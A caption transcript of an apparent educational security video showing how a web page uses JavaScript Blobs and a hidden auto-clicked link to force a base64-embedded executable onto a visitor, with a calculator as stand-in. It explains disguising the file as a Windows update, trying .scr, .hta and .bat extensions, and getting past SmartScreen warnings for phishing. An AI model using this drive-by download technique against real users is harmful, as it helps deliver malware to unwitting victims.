INSTANT File Downloads with JavaScript

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

have you ever been browsing the internet and all of a sudden a pop-up appears and then a file is downloaded onto your computer automatically without any user interaction have you ever wondered how do they do that what is happening or maybe you're a penetration tester a red team or an ethical hacker and you're wondering hey that might be a pretty cool technique for some social engineering some fishing some deception something that you want to weaponize and add to your toolkit so in this video that is exactly what we are going to do I'm going to show you some syntax some simple quick Showcase of how you might be able to put this together and instantly download a file onto a Target or victim computer just by browsing to a page within their web browser like Google Chrome Internet Explorer Firefox so let's get to it okay so I'm going to be working in my windows 11 virtual machine I do want to be targeting a Windows operating system for this gives it a little bit more realism although we could totally write this within Linux and Kali in Ubuntu whatever distribution you might like I am going to open up my file explorer and within my desktop I do want to just simply create a new file I'm going to create a text document and we can end up renaming this but ultimately we're going to create an HTML file I'll call it index and I'll actually change the view options to actually show file name extensions and I relieve my faces in the waves but all that is is hitting the show file name extensions options so that when I rename this I can right click and rename or edit the properties I guess F2 is also a good hotkey that will work for me and if I just change this to an HTML extension that means I'm now working with a hypertext markup language file and I can include any other markup language it would be worthwhile for web browser to actually render that it means we can also include JavaScript or some client-side code and we get this pop-up hey if you change a file name extension it might become unusable yep we totally know what we're doing here and now you can see that's been created on the desktop and we can work with it in our file browser what I'm going to to do next is right click and open with I do want to open this with a text editor I'll be using visual studio code because I'm on Windows here you could very well be using a Sublime Text or if you're working in the Linux World hey you could be using Vim or emacs or whatever text editor suits your fancy here but now we are opened up this empty file index.html and we can start to write some HTML we'll start off with a doctype which is good necessary boilerplate for HTML code and all HTML tags need to begin and end with their element tags right these less than greater than arrows here waka waka as you might hear them and then we need a head tag and a body tag that is if you aren't familiar with HTML is where everything really lives within your application what I'm going to end up doing is simply creating a header to have some text to render onto the page but ultimately we need to be working within any tags that we particularly want but ultimately we need to have JavaScript before I end up putting that together I do just want to validate this looks good and works for us so I'm going to hop back over to that open up this file within my web browser and there I do have this small simple page good enough let's go ahead and start to write some JavaScript I am going to end up putting this within our body tag because I do kind of want it to render right away and I'm going to end up adding a script tag now this is how we could just natively end up writing JavaScript I believe you could add some other attributes here to make it more okay third party or external or have it reference or Source some other location but for the sake of our learning demonstration and exploration let's just put it all right here so ultimately we want to create a couple variables because the way that we send up providing a file to download is by you know kind of embedding the file into this own page so that it can just spit it out to the user so we might give it a file name that we want to end up using we could do something cheesy like windows updater.exe fair to say yeah but then we need the actual file contents or sort of the oh file data right and how will we actually embed this into the page well some way to do that is honestly just slapping the entire contents of the file that we want into this location or into some Javascript file or something that it might be able to either externally load or read just to still spit it out to you and this is where you can really get creative again for our showcase example I'm just going to end up embedding this but again you could make it load or reach some other resource and actually access it some other way you could have it redirect through a couple different layers of obfuscations or masks or whatever you want but I'm just going to end up base64 encoding the data here now what I'll end up doing is actually probably grabbing the calculator application and then base64 encoding that let's see if I can do that nice and easy within Powershell okay I've opened up the Powershell command line and I know that I want to get all the contents of C Windows system 32 and we'll just use again the calculator.exe as our proof of concept as a small trivial innocent proof of concept this gives us a whole lot of nothing it is just the raw bytes so we want to be able to actually embed that as base64. let me uh grab the syntax because I always forget how to do this in Powershell I'll find that online real quick okay I just grabbed the syntax online uh we created base64 string variable where we convert to base64 string uh getting the i o file reading all bytes from the specific file here this will end up spinning it into that base64 string variable but for the sake of me being able to copy and paste it I do just want to slap that to a temporary file I guess I'll call that just temporary.log and then we can go ahead and open that file uh code temporary.log there we go here's a whole lot of base64. cool so we can copy and paste that so now again this is just a proof of concept as to how you might be able to do this again this is kind of simple pretty easy kind of trivial again you could add whatever redirection or creative stuff you might like here to make that a little bit more fun or stealthy But ultimately we're just using the base64 encoded rendition of the file and now we need to be able to actually decode that within JavaScript so what we can do is Define a function here while we have the file contents and the data here in base64 we need to convert that base64 to bytes given some I guess b64 data as an argument correct now we can go ahead and retrieve the binary values within JavaScript by running that atob function and if you aren't familiar atob will go ahead in base64 decode some values within JavaScript and that's where we can pass in our b64 data now that returns a big long list and we want to determine how long that list really is so let's go ahead and create a new variable just to determine the length of that binary values and then what we can do is ultimately create our own bytes data new array that we might like we're going to end up creating a uint 8 array so that we are just retrieving the integer representation of all of these bytes up to the length of the binary that we had already retrieved now I know that is kind of weird to think about but we're just basically creating a secondary placeholder for the bytes of the file uh decoded from base64 and getting it into a representation that we can sanely play with within JavaScript so the way that we have to do that that is actually look through every single byte so you'll use a for Loop to do this we'll loop I as our iterator and increment up to that binary length adding and incrementing all the way across I might need to add a VAR I here okay and what we could do then is actually say our bytes data at that index or counting with that iterator I can equal our binary values that we've already retrieved from base64 decoding this value and actually getting the character code at the position I or that index so this will go ahead and return out in fact we actually have to return the bytes data buffer so ultimately our function will go ahead and base64 decode this and return it all as bytes that we can work with within JavaScript and that is how we might be able to retrieve the data and slap it out to the browser in a file download but we need to end up doing that by specifying okay our new file bytes can equal our base 64 two bytes function passing in our file data that we know just above is that base64 encoded string perfect now this is where the magic happens this is where we have to go ahead and Define a blob that will go ahead and actually encapsulate this data for us in fact that has to be a new blob because it's a sort of object here and it'll actually pass in the data or the file bytes that we've just retrieved up top into a blob ultimately specifying okay this has a specific unique mime type so you pass that in with curly braces here to denote okay these are the options that might go to it or however inside the blob is the data that you need and you can see Visual Studio code is helping us to find that but ultimately our type is going to be an octet slash stream because this will be something that we have to download so now that we've defined this blob object to kind of reference and refer to our data we need to basically Force the user to download the and we can do that by basically creating a HTML anchor tag or that a element that you often see so we can say hey let's use our document to go ahead and create a new element and we'll go ahead and create a simple a tag we'll go ahead and append that to the body of our document and we can even make it Invisible by setting some CSS styling changing the display to be none so that way it will not render on the page and now the important part we need to create a URL that will reach out and actually access our blob that we created earlier and I believe that is create object URL within that window sort of sub component or module within the window itself here and we can go ahead and pass in our blob now we'll set this as our anchors Target here a anchor href equals that URL that we've created and then we want to actually force that to download our specific file name that way it knows okay we're going to end up sending this file Windows updater based off of The Blob that we've determined created off of our base64 decoded data and now that we have finally created that anchor object we do need to force and click on that a tag in HTML element so it will begin the download automatically we could also go ahead and use our window URL revoke object URL and that will actually I think believe remove this and if there's any portion of this code that you don't exactly understand you know the whole point is to learn here let me see what this ends up doing it releases an existing object URL that was previously created by calling URL create object URL so it looks pretty necessary for what we end up using with that syntax here and this is actually end up creating our blob object and if you want to learn more about the blob you can see it's basically a file like object of that raw data that we've been able to carve out from our base64 and again how you include this base64 it doesn't need to be just slapped into this to hold document on its own you could go ahead and actually retrieve that from a different location or get creative with it but again for the Showcase here that's A-Okay so let's go see this thing in action I'm gonna go ahead and open up my index.html and theoretically we should be able to see this thing start a download now because this is an executable file because it literally has a DOT exe you should see some browsers say hey this is a little bit weird are you sure you want to download this you don't normally download executables right off the internet but this is still something that we might be able to work around and play with and in fact we'll get to Tinker with some of these file names super quick oh actually looks like Windows updater just took that right away you might have noticed that download down here and of course it is simply the calculator application oh hey smart screen probably at least saw that was a uh file with a mark of the web or motw that is something that if we go explore it here I'll close this out if I move to my downloads here's our windows updater.exe that we just downloaded it is of course the windows calculator but checking out the properties over here you might notice it has this optional security portion it says hey this file came from another computer and might be blocked to help protect this computer that is why smart screen and this blue thing ends up just popping up if you wanted to run anyway or don't run sure you very well could uh but actually just unblocking that in the properties is what ends up to say labeling and not needing smart screen there we go there's our innocent benign proof of concept calculator here but you can make this a payload you can make this malicious you could do really whatever you want with it I'm a little bit surprised that that didn't hate trigger and Warren like hey are you sure you want to download that it might be because it's already you know assigned weighted native Windows executable but how does that look in Edge let me actually open that up get back to my desktop let me open with Microsoft Edge oh here it is windows updater.exe isn't commonly downloaded or you make sure you trust this thing before you do and then you can end up running that keep option and then they're like look are you really sure you want to do this like yeah yeah yeah and it lets you do it then it's automatically downloaded there was no interaction for me to do that other than yes I'm cool with it but if we were to change this to something like a Windows updater.com and then if you wanted to or like a batch script file you very well could but then you of course need to you know have an appropriately typed file for that file extension so that once you once the user clicks on it it'll know to do that I think also they do some interesting things here um and if I if I make this an scr which is again a screen saver file everyone was tweaking out in the previous videos uh that I might have misspoke on there it is still a Windows executable without a doubt so I wonder if that will have the exact same functionality let's open this up in Chrome Windows updater.scr double clicking on that we got smart screen oh I do want to run that regardless so let me hit run anyway there's our calculator let me try that with Edge open with Edge yep not commonly downloaded so let's try a different okay leave me alone let me leave let me leave uh you could use like batch the thing is I have seen some browsers oh windows.bat just took it on its phone it didn't I I would have expected Chrome to try and add another suffix to this like a DOT download or another file extension on top of the extension that it had previously so how does Edge look yep not commonly downloaded so Edge is being a little bit hey finickier than uh Chrome is let me clear out these downloads here you could change this to dot HTA for a hypertext application something that mshg might be able to put together you could have it run a jscript file not simply JavaScript but targeting the Windows operating system or VBA for Visual Basic or VBS or vbe I think yeah one of those I don't know or you can do Force download a malicious document like a Microsoft Office macros document thing a whole lot of options here let's try HTA let's see if that would come through and of course you would need to change the contents appropriately within your file data but that's the proof of concept here and this is that syntax that might let you do it try that windows updater.hta cool and if we wanted to hey uh it should let us just come through that without an issue now again this is an HTML file if I were to host this on something like hey Apache or nginx or python like a simple HTTP server or just an HTTP server it should I don't know maybe do the very same thing I'm opening this locally because it is client-side HTML and JavaScript I wonder if that's worth anything changing do I have python on this box no python three no all right so I can't readily show you I mean I guess we could just slap that syntax somewhere else let me showcase this on a host so I am just on my actual computer here let me create just a simple hey index.html and let's open that with Sublime Text slap it all this code in uh and now let's get a terminal rolling cool so here on my desktop let's do a Python 3 techm http.server and yep Python's good to do it okay now I have a browser open let's go to localhost 8000 and oh okay now Chrome is the one saying hey this type of file can harm your computer uh yes and we can keep it that's all the ask that it needs hey super quick sorry John from the future here just wanted to make a note this is actually something that some folks have seen Dropbox do even in the URL like in the link that you open in your address bar after the question mark were a couple of the like HTTP get variables are I think there's one called DL and I might be getting that name wrong but honestly just changing a zero to a one or toggling that will make it an instant file download so just an interesting tidbit just want to note it I think some people have noticed that's a little bit interesting or sketched sometimes but hey Wanda flag Dropbox can do that just as well so something to keep in mind your mileage may vary with this you do rely on a little bit of social engineering a little bit of trickery a little bit of hey getting the user to actually fall for opening this and detonating it on their own volition you have at least made this easier by forcing and jamming the file download onto their machine and it's a little bit more prompted like oh hey it's a Windows update it could very easily make that part of a ploy or dispatch option of social engineering phishing scheme to you know trick a user to do something I've heard this technique called a drive-by download that is kind of what I tend to refer to it as however you know that has its own connotation so I tried not to say that within the first minute of the video with that said hey it is the syntax you might be able to use for HTML JavaScript Force an instant file download and that is all it really takes I'll try and slap this code out on a GitHub gist or something so it's accessible for you but that's all that we're end up doing and you can go Google around if you'd like any more of that research and documentation on like oh what is the blob what is this window create URL Etc uh you're just creating an element forcing it to click and having the code embedded in a way that the browser and JavaScript can render it out for you get creative with how you hide or mask that it doesn't have to be base64 but that is one way to do it and for learning showcase education here thought that would be worthwhile thanks so much for watching Everybody I've been rambling for way too long let's close this thing out here I love you I'll see in the next video like comment subscribe you you know the drill thanks everyone

Info

Channel: John Hammond

Views: 154,605

Rating: undefined out of 5

Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners

Id: KTxsBW9SkOU

Channel Id: undefined

Length: 21min 5sec (1265 seconds)

Published: Mon Sep 26 2022